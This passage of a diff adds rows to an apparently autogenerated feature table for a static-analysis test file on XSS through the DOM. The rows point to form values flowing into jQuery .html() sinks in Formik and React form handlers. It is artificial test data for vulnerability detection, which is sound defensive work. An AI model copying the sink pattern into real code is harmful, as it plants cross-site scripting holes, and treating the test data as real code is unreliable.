$ | | autogenerated/Xss/XssThroughDom/forms.js:12:19:12:23 | "#id" | InputArgumentIndex | 0 | | autogenerated/Xss/XssThroughDom/forms.js:12:19:12:23 | "#id" | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | @@ -24263,6 +158981,16 @@ tokenFeatures | autogenerated/Xss/XssThroughDom/forms.js:12:19:12:23 | "#id" | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | | autogenerated/Xss/XssThroughDom/forms.js:12:19:12:23 | "#id" | enclosingFunctionName | FormikBasic | | autogenerated/Xss/XssThroughDom/forms.js:12:19:12:23 | "#id" | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:12:26:12:29 | html | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:12:26:12:29 | html | contextSurroundingFunctionParameters | ()\n(values, ?) | +| autogenerated/Xss/XssThroughDom/forms.js:12:26:12:29 | html | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:12:26:12:29 | html | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:12:26:12:29 | html | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:12:31:12:36 | values | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:12:31:12:36 | values | contextSurroundingFunctionParameters | ()\n(values, ?) | +| autogenerated/Xss/XssThroughDom/forms.js:12:31:12:36 | values | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:12:31:12:36 | values | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:12:31:12:36 | values | fileImports | formik react react-final-form react-hook-form | | autogenerated/Xss/XssThroughDom/forms.js:12:31:12:40 | values.bar | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/XssThroughDom/forms.js:12:31:12:40 | values.bar | InputArgumentIndex | 0 | | autogenerated/Xss/XssThroughDom/forms.js:12:31:12:40 | values.bar | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | @@ -24270,12 +158998,128 @@ tokenFeatures | autogenerated/Xss/XssThroughDom/forms.js:12:31:12:40 | values.bar | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | | autogenerated/Xss/XssThroughDom/forms.js:12:31:12:40 | values.bar | enclosingFunctionName | FormikBasic | | autogenerated/Xss/XssThroughDom/forms.js:12:31:12:40 | values.bar | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:12:38:12:40 | bar | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:12:38:12:40 | bar | contextSurroundingFunctionParameters | ()\n(values, ?) | +| autogenerated/Xss/XssThroughDom/forms.js:12:38:12:40 | bar | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:12:38:12:40 | bar | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:12:38:12:40 | bar | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:14:10:15:12 | \\n | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:14:10:15:12 | \\n | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:14:10:15:12 | \\n | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:14:10:15:12 | \\n | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:14:10:15:12 | \\n | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:15:14:17:13 | 'arguments' object of anonymous function | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:15:14:17:13 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:15:14:17:13 | 'arguments' object of anonymous function | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:15:14:17:13 | 'arguments' object of anonymous function | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:15:14:17:13 | 'arguments' object of anonymous function | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:15:14:17:13 | (inputs ... ) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:15:14:17:13 | (inputs ... ) | contextSurroundingFunctionParameters | ()\n(inputs) | +| autogenerated/Xss/XssThroughDom/forms.js:15:14:17:13 | (inputs ... ) | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:15:14:17:13 | (inputs ... ) | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:15:14:17:13 | (inputs ... ) | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:15:14:17:13 | exceptional return of anonymous function | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:15:14:17:13 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:15:14:17:13 | exceptional return of anonymous function | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:15:14:17:13 | exceptional return of anonymous function | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:15:14:17:13 | exceptional return of anonymous function | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:15:14:17:13 | return of anonymous function | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:15:14:17:13 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:15:14:17:13 | return of anonymous function | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:15:14:17:13 | return of anonymous function | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:15:14:17:13 | return of anonymous function | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:15:15:15:20 | inputs | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:15:15:15:20 | inputs | contextSurroundingFunctionParameters | ()\n(inputs) | +| autogenerated/Xss/XssThroughDom/forms.js:15:15:15:20 | inputs | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:15:15:15:20 | inputs | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:15:15:15:20 | inputs | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:15:26:17:13 | (\\n ... ) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:15:26:17:13 | (\\n ... ) | contextSurroundingFunctionParameters | ()\n(inputs) | +| autogenerated/Xss/XssThroughDom/forms.js:15:26:17:13 | (\\n ... ) | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:15:26:17:13 | (\\n ... ) | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:15:26:17:13 | (\\n ... ) | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:16:17:16:53 |
    | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:16:17:16:53 | | contextSurroundingFunctionParameters | ()\n(inputs) | +| autogenerated/Xss/XssThroughDom/forms.js:16:17:16:53 | | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:16:17:16:53 | | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:16:17:16:53 | | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:16:18:16:21 | form | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:16:18:16:21 | form | contextSurroundingFunctionParameters | ()\n(inputs) | +| autogenerated/Xss/XssThroughDom/forms.js:16:18:16:21 | form | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:16:18:16:21 | form | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:16:18:16:21 | form | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:16:23:16:30 | onSubmit | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:16:23:16:30 | onSubmit | contextSurroundingFunctionParameters | ()\n(inputs) | +| autogenerated/Xss/XssThroughDom/forms.js:16:23:16:30 | onSubmit | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:16:23:16:30 | onSubmit | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:16:23:16:30 | onSubmit | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:16:23:16:45 | onSubmi ... Submit} | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:16:23:16:45 | onSubmi ... Submit} | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:16:23:16:45 | onSubmi ... Submit} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:16:23:16:45 | onSubmi ... Submit} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:16:23:16:45 | onSubmi ... Submit} | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:16:23:16:45 | onSubmi ... Submit} | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:16:23:16:45 | onSubmi ... Submit} | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:16:23:16:45 | onSubmi ... Submit} | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:16:23:16:45 | onSubmi ... Submit} | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:16:23:16:45 | onSubmi ... Submit} | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:16:33:16:44 | handleSubmit | assignedToPropName | onSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:16:33:16:44 | handleSubmit | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:16:33:16:44 | handleSubmit | contextSurroundingFunctionParameters | ()\n(inputs) | +| autogenerated/Xss/XssThroughDom/forms.js:16:33:16:44 | handleSubmit | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:16:33:16:44 | handleSubmit | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:16:33:16:44 | handleSubmit | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:17:15:18:8 | \\n | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:17:15:18:8 | \\n | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:17:15:18:8 | \\n | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:17:15:18:8 | \\n | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:17:15:18:8 | \\n | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:18:18:19:4 | \\n | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:18:18:19:4 | \\n | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:18:18:19:4 | \\n | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:18:18:19:4 | \\n | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:18:18:19:4 | \\n | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:22:7:22:20 | FormikEnhanced | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:22:7:22:20 | FormikEnhanced | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:22:7:22:20 | FormikEnhanced | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:22:7:31:10 | FormikE ... MyForm) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:22:7:31:10 | FormikE ... MyForm) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:22:7:31:10 | FormikE ... MyForm) | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:22:24:22:33 | withFormik | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:22:24:22:33 | withFormik | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:22:24:22:33 | withFormik | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:22:24:31:2 | exceptional return of withFor ... }\\n}) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:22:24:31:2 | exceptional return of withFor ... }\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:22:24:31:2 | exceptional return of withFor ... }\\n}) | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:22:24:31:2 | withFor ... }\\n}) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:22:24:31:2 | withFor ... }\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:22:24:31:2 | withFor ... }\\n}) | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:22:24:31:10 | exceptional return of withFor ... MyForm) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:22:24:31:10 | exceptional return of withFor ... MyForm) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:22:24:31:10 | exceptional return of withFor ... MyForm) | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:22:24:31:10 | withFor ... MyForm) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:22:24:31:10 | withFor ... MyForm) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:22:24:31:10 | withFor ... MyForm) | fileImports | formik react react-final-form react-hook-form | | autogenerated/Xss/XssThroughDom/forms.js:22:35:31:1 | {\\n m ... }\\n} | CalleeFlexibleAccessPath | withFormik | | autogenerated/Xss/XssThroughDom/forms.js:22:35:31:1 | {\\n m ... }\\n} | InputArgumentIndex | 0 | | autogenerated/Xss/XssThroughDom/forms.js:22:35:31:1 | {\\n m ... }\\n} | calleeImports | formik | | autogenerated/Xss/XssThroughDom/forms.js:22:35:31:1 | {\\n m ... }\\n} | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | | autogenerated/Xss/XssThroughDom/forms.js:22:35:31:1 | {\\n m ... }\\n} | contextSurroundingFunctionParameters | | | autogenerated/Xss/XssThroughDom/forms.js:22:35:31:1 | {\\n m ... }\\n} | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:23:5:23:20 | mapPropsToValues | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:23:5:23:20 | mapPropsToValues | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:23:5:23:20 | mapPropsToValues | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:23:5:23:42 | mapProp ... : '' }) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:23:5:23:42 | mapProp ... : '' }) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:23:5:23:42 | mapProp ... : '' }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:23:5:23:42 | mapProp ... : '' }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:23:5:23:42 | mapProp ... : '' }) | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:23:5:23:42 | mapProp ... : '' }) | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:23:23:23:42 | 'arguments' object of method mapPropsToValues | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:23:23:23:42 | 'arguments' object of method mapPropsToValues | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:23:23:23:42 | 'arguments' object of method mapPropsToValues | enclosingFunctionBody | name | +| autogenerated/Xss/XssThroughDom/forms.js:23:23:23:42 | 'arguments' object of method mapPropsToValues | enclosingFunctionName | mapPropsToValues | +| autogenerated/Xss/XssThroughDom/forms.js:23:23:23:42 | 'arguments' object of method mapPropsToValues | fileImports | formik react react-final-form react-hook-form | | autogenerated/Xss/XssThroughDom/forms.js:23:23:23:42 | () => ({ name: '' }) | CalleeFlexibleAccessPath | withFormik | | autogenerated/Xss/XssThroughDom/forms.js:23:23:23:42 | () => ({ name: '' }) | InputAccessPathFromCallee | 0.mapPropsToValues | | autogenerated/Xss/XssThroughDom/forms.js:23:23:23:42 | () => ({ name: '' }) | InputArgumentIndex | 0 | @@ -24284,6 +159128,81 @@ tokenFeatures | autogenerated/Xss/XssThroughDom/forms.js:23:23:23:42 | () => ({ name: '' }) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | | autogenerated/Xss/XssThroughDom/forms.js:23:23:23:42 | () => ({ name: '' }) | contextSurroundingFunctionParameters | () | | autogenerated/Xss/XssThroughDom/forms.js:23:23:23:42 | () => ({ name: '' }) | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:23:23:23:42 | exceptional return of method mapPropsToValues | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:23:23:23:42 | exceptional return of method mapPropsToValues | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:23:23:23:42 | exceptional return of method mapPropsToValues | enclosingFunctionBody | name | +| autogenerated/Xss/XssThroughDom/forms.js:23:23:23:42 | exceptional return of method mapPropsToValues | enclosingFunctionName | mapPropsToValues | +| autogenerated/Xss/XssThroughDom/forms.js:23:23:23:42 | exceptional return of method mapPropsToValues | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:23:23:23:42 | return of method mapPropsToValues | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:23:23:23:42 | return of method mapPropsToValues | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:23:23:23:42 | return of method mapPropsToValues | enclosingFunctionBody | name | +| autogenerated/Xss/XssThroughDom/forms.js:23:23:23:42 | return of method mapPropsToValues | enclosingFunctionName | mapPropsToValues | +| autogenerated/Xss/XssThroughDom/forms.js:23:23:23:42 | return of method mapPropsToValues | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:23:29:23:42 | ({ name: '' }) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:23:29:23:42 | ({ name: '' }) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:23:29:23:42 | ({ name: '' }) | enclosingFunctionBody | name | +| autogenerated/Xss/XssThroughDom/forms.js:23:29:23:42 | ({ name: '' }) | enclosingFunctionName | mapPropsToValues | +| autogenerated/Xss/XssThroughDom/forms.js:23:29:23:42 | ({ name: '' }) | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:23:30:23:41 | { name: '' } | contextFunctionInterfaces | 